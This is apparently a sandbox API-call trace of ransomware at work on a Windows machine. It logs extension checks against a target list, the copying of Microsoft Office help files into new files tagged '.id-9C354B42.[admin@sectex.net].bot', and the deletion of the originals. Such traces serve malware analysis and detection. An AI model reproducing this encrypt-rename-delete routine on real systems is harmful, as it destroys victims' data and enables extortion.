	[0149.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_F_COL.HXK") returned 70
	[0149.880] lstrlenW (lpString=".dbf") returned 4
	[0149.880] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0149.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_F_COL.HXK") returned 70
	[0149.880] lstrlenW (lpString=".1cd") returned 4
	[0149.880] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0149.880] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_F_COL.HXK") returned 70
	[0149.880] lstrlenW (lpString=".jpg") returned 4
	[0149.880] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0149.881] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0149.881] lstrlenW (lpString="POWERPNT.DEV_K_COL.HXK") returned 22
	[0149.881] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt.dev_k_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0149.881] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=113) returned 1
	[0149.881] CloseHandle (hObject=0x384) returned 1
	[0149.881] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt.dev_k_col.hxk")) returned 0x20
	[0149.881] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt.dev_k_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.882] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt.dev_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0149.882] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.882] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.882] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt.dev_k_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec
	[0149.882] GetLastError () returned 0x0
	[0149.882] ReadFile (in: hFile=0x384, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x71, lpOverlapped=0x0) returned 1
	[0149.883] WriteFile (in: hFile=0x3ec, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x80, lpOverlapped=0x0) returned 1
	[0149.884] ReadFile (in: hFile=0x384, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.884] WriteFile (in: hFile=0x3ec, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x100, lpOverlapped=0x0) returned 1
	[0149.884] SetEndOfFile (hFile=0x3ec) returned 1
	[0149.885] CloseHandle (hObject=0x3ec) returned 1
	[0149.885] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.885] SetEndOfFile (hFile=0x384) returned 1
	[0149.887] CloseHandle (hObject=0x384) returned 1
	[0149.887] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.887] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt.dev_k_col.hxk")) returned 1
	[0149.888] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_K_COL.HXK") returned 70
	[0149.888] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_K_COL.HXK") returned 70
	[0149.888] lstrlenW (lpString=".doc") returned 4
	[0149.888] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0149.888] lstrlenW (lpString=".docx") returned 5
	[0149.888] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0149.888] lstrlenW (lpString=".pdf") returned 4
	[0149.888] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0149.888] lstrlenW (lpString=".xls") returned 4
	[0149.888] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0149.888] lstrlenW (lpString=".xlsx") returned 5
	[0149.888] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0149.888] lstrlenW (lpString=".ppt") returned 4
	[0149.888] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0149.888] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_K_COL.HXK") returned 70
	[0149.888] lstrlenW (lpString=".zip") returned 4
	[0149.888] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0149.889] lstrlenW (lpString=".rar") returned 4
	[0149.889] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0149.889] lstrlenW (lpString=".bz2") returned 4
	[0149.889] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0149.889] lstrlenW (lpString=".7z") returned 3
	[0149.889] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0149.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_K_COL.HXK") returned 70
	[0149.889] lstrlenW (lpString=".dbf") returned 4
	[0149.889] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0149.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_K_COL.HXK") returned 70
	[0149.889] lstrlenW (lpString=".1cd") returned 4
	[0149.889] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0149.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_K_COL.HXK") returned 70
	[0149.889] lstrlenW (lpString=".jpg") returned 4
	[0149.889] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0149.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_K_COL.HXK") returned 70
	[0149.889] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_K_COL.HXK") returned 70
	[0149.889] lstrlenW (lpString=".doc") returned 4
	[0149.889] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0149.889] lstrlenW (lpString=".docx") returned 5
	[0149.889] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0149.889] lstrlenW (lpString=".pdf") returned 4
	[0149.889] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0149.889] lstrlenW (lpString=".xls") returned 4
	[0149.889] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0149.889] lstrlenW (lpString=".xlsx") returned 5
	[0149.889] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0149.889] lstrlenW (lpString=".ppt") returned 4
	[0149.890] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0149.890] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_K_COL.HXK") returned 70
	[0149.890] lstrlenW (lpString=".zip") returned 4
	[0149.890] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0149.890] lstrlenW (lpString=".rar") returned 4
	[0149.890] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0149.890] lstrlenW (lpString=".bz2") returned 4
	[0149.890] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0149.890] lstrlenW (lpString=".7z") returned 3
	[0149.890] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0149.890] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_K_COL.HXK") returned 70
	[0149.890] lstrlenW (lpString=".dbf") returned 4
	[0149.890] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0149.890] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_K_COL.HXK") returned 70
	[0149.890] lstrlenW (lpString=".1cd") returned 4
	[0149.890] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0149.890] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.DEV_K_COL.HXK") returned 70
	[0149.890] lstrlenW (lpString=".jpg") returned 4
	[0149.890] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0149.890] lstrcmpiW (lpString1=".HXS", lpString2=".bot") returned 1
	[0149.890] lstrlenW (lpString="POWERPNT.HXS") returned 12
	[0149.890] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt.hxs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0149.891] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=6816061) returned 1
	[0149.891] CloseHandle (hObject=0x384) returned 1
	[0149.891] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt.hxs")) returned 0x20
	[0149.891] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt.hxs.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.891] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt.hxs"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt.hxs.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0149.891] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.HXS") returned 60
	[0149.891] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.HXS") returned 60
	[0149.891] lstrlenW (lpString=".doc") returned 4
	[0149.891] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0149.891] lstrlenW (lpString=".docx") returned 5
	[0149.891] lstrcmpiW (lpString1=".docx", lpString2="T.HXS") returned -1
	[0149.891] lstrlenW (lpString=".pdf") returned 4
	[0149.892] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0149.892] lstrlenW (lpString=".xls") returned 4
	[0149.892] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0149.892] lstrlenW (lpString=".xlsx") returned 5
	[0149.892] lstrcmpiW (lpString1=".xlsx", lpString2="T.HXS") returned -1
	[0149.892] lstrlenW (lpString=".ppt") returned 4
	[0149.892] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0149.892] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.HXS") returned 60
	[0149.892] lstrlenW (lpString=".zip") returned 4
	[0149.892] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0149.892] lstrlenW (lpString=".rar") returned 4
	[0149.892] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0149.892] lstrlenW (lpString=".bz2") returned 4
	[0149.892] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0149.892] lstrlenW (lpString=".7z") returned 3
	[0149.892] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0149.892] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.HXS") returned 60
	[0149.892] lstrlenW (lpString=".dbf") returned 4
	[0149.892] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0149.892] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.HXS") returned 60
	[0149.892] lstrlenW (lpString=".1cd") returned 4
	[0149.893] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0149.893] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.HXS") returned 60
	[0149.893] lstrlenW (lpString=".jpg") returned 4
	[0149.893] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0149.893] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.HXS") returned 60
	[0149.893] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.HXS") returned 60
	[0149.893] lstrlenW (lpString=".doc") returned 4
	[0149.893] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0149.893] lstrlenW (lpString=".docx") returned 5
	[0149.893] lstrcmpiW (lpString1=".docx", lpString2="T.HXS") returned -1
	[0149.893] lstrlenW (lpString=".pdf") returned 4
	[0149.893] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0149.893] lstrlenW (lpString=".xls") returned 4
	[0149.893] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0149.893] lstrlenW (lpString=".xlsx") returned 5
	[0149.893] lstrcmpiW (lpString1=".xlsx", lpString2="T.HXS") returned -1
	[0149.893] lstrlenW (lpString=".ppt") returned 4
	[0149.893] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0149.893] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.HXS") returned 60
	[0149.893] lstrlenW (lpString=".zip") returned 4
	[0149.893] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0149.893] lstrlenW (lpString=".rar") returned 4
	[0149.893] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0149.893] lstrlenW (lpString=".bz2") returned 4
	[0149.893] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0149.893] lstrlenW (lpString=".7z") returned 3
	[0149.893] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0149.893] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.HXS") returned 60
	[0149.893] lstrlenW (lpString=".dbf") returned 4
	[0149.894] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0149.894] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.HXS") returned 60
	[0149.894] lstrlenW (lpString=".1cd") returned 4
	[0149.894] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0149.894] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT.HXS") returned 60
	[0149.894] lstrlenW (lpString=".jpg") returned 4
	[0149.894] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0149.894] lstrcmpiW (lpString1=".HXC", lpString2=".bot") returned 1
	[0149.894] lstrlenW (lpString="POWERPNT_COL.HXC") returned 16
	[0149.894] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt_col.hxc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0149.894] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=636) returned 1
	[0149.894] CloseHandle (hObject=0x384) returned 1
	[0149.895] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt_col.hxc")) returned 0x20
	[0149.895] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt_col.hxc.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.895] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0149.895] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.895] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.895] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt_col.hxc.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec
	[0149.896] GetLastError () returned 0x0
	[0149.896] ReadFile (in: hFile=0x384, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x27c, lpOverlapped=0x0) returned 1
	[0149.897] WriteFile (in: hFile=0x3ec, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x280, lpOverlapped=0x0) returned 1
	[0149.898] ReadFile (in: hFile=0x384, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.898] WriteFile (in: hFile=0x3ec, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xf4, lpOverlapped=0x0) returned 1
	[0149.898] SetEndOfFile (hFile=0x3ec) returned 1
	[0149.898] CloseHandle (hObject=0x3ec) returned 1
	[0149.898] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.899] SetEndOfFile (hFile=0x384) returned 1
	[0149.901] CloseHandle (hObject=0x384) returned 1
	[0149.901] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_COL.HXC.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.901] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt_col.hxc")) returned 1
	[0149.901] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_COL.HXC") returned 64
	[0149.901] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_COL.HXC") returned 64
	[0149.901] lstrlenW (lpString=".doc") returned 4
	[0149.902] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0149.902] lstrlenW (lpString=".docx") returned 5
	[0149.902] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0149.902] lstrlenW (lpString=".pdf") returned 4
	[0149.902] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0149.902] lstrlenW (lpString=".xls") returned 4
	[0149.902] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0149.902] lstrlenW (lpString=".xlsx") returned 5
	[0149.902] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0149.902] lstrlenW (lpString=".ppt") returned 4
	[0149.902] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0149.902] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_COL.HXC") returned 64
	[0149.902] lstrlenW (lpString=".zip") returned 4
	[0149.902] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0149.902] lstrlenW (lpString=".rar") returned 4
	[0149.902] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0149.902] lstrlenW (lpString=".bz2") returned 4
	[0149.902] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0149.902] lstrlenW (lpString=".7z") returned 3
	[0149.902] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0149.902] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_COL.HXC") returned 64
	[0149.902] lstrlenW (lpString=".dbf") returned 4
	[0149.902] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0149.902] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_COL.HXC") returned 64
	[0149.902] lstrlenW (lpString=".1cd") returned 4
	[0149.902] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0149.902] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_COL.HXC") returned 64
	[0149.902] lstrlenW (lpString=".jpg") returned 4
	[0149.902] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0149.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_COL.HXC") returned 64
	[0149.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_COL.HXC") returned 64
	[0149.903] lstrlenW (lpString=".doc") returned 4
	[0149.903] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0149.903] lstrlenW (lpString=".docx") returned 5
	[0149.903] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0149.903] lstrlenW (lpString=".pdf") returned 4
	[0149.903] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0149.903] lstrlenW (lpString=".xls") returned 4
	[0149.903] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0149.903] lstrlenW (lpString=".xlsx") returned 5
	[0149.903] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0149.903] lstrlenW (lpString=".ppt") returned 4
	[0149.903] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0149.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_COL.HXC") returned 64
	[0149.903] lstrlenW (lpString=".zip") returned 4
	[0149.903] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0149.903] lstrlenW (lpString=".rar") returned 4
	[0149.903] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0149.903] lstrlenW (lpString=".bz2") returned 4
	[0149.903] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0149.903] lstrlenW (lpString=".7z") returned 3
	[0149.903] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0149.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_COL.HXC") returned 64
	[0149.903] lstrlenW (lpString=".dbf") returned 4
	[0149.903] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0149.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_COL.HXC") returned 64
	[0149.903] lstrlenW (lpString=".1cd") returned 4
	[0149.903] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0149.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_COL.HXC") returned 64
	[0149.903] lstrlenW (lpString=".jpg") returned 4
	[0149.903] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0149.904] lstrcmpiW (lpString1=".HXT", lpString2=".bot") returned 1
	[0149.904] lstrlenW (lpString="POWERPNT_COL.HXT") returned 16
	[0149.904] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt_col.hxt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0149.904] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=208) returned 1
	[0149.904] CloseHandle (hObject=0x384) returned 1
	[0149.904] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt_col.hxt")) returned 0x20
	[0149.904] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt_col.hxt.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.905] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0149.905] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.905] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.905] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\POWERPNT_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\powerpnt_col.hxt.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec
	[0149.905] GetLastError () returned 0x0
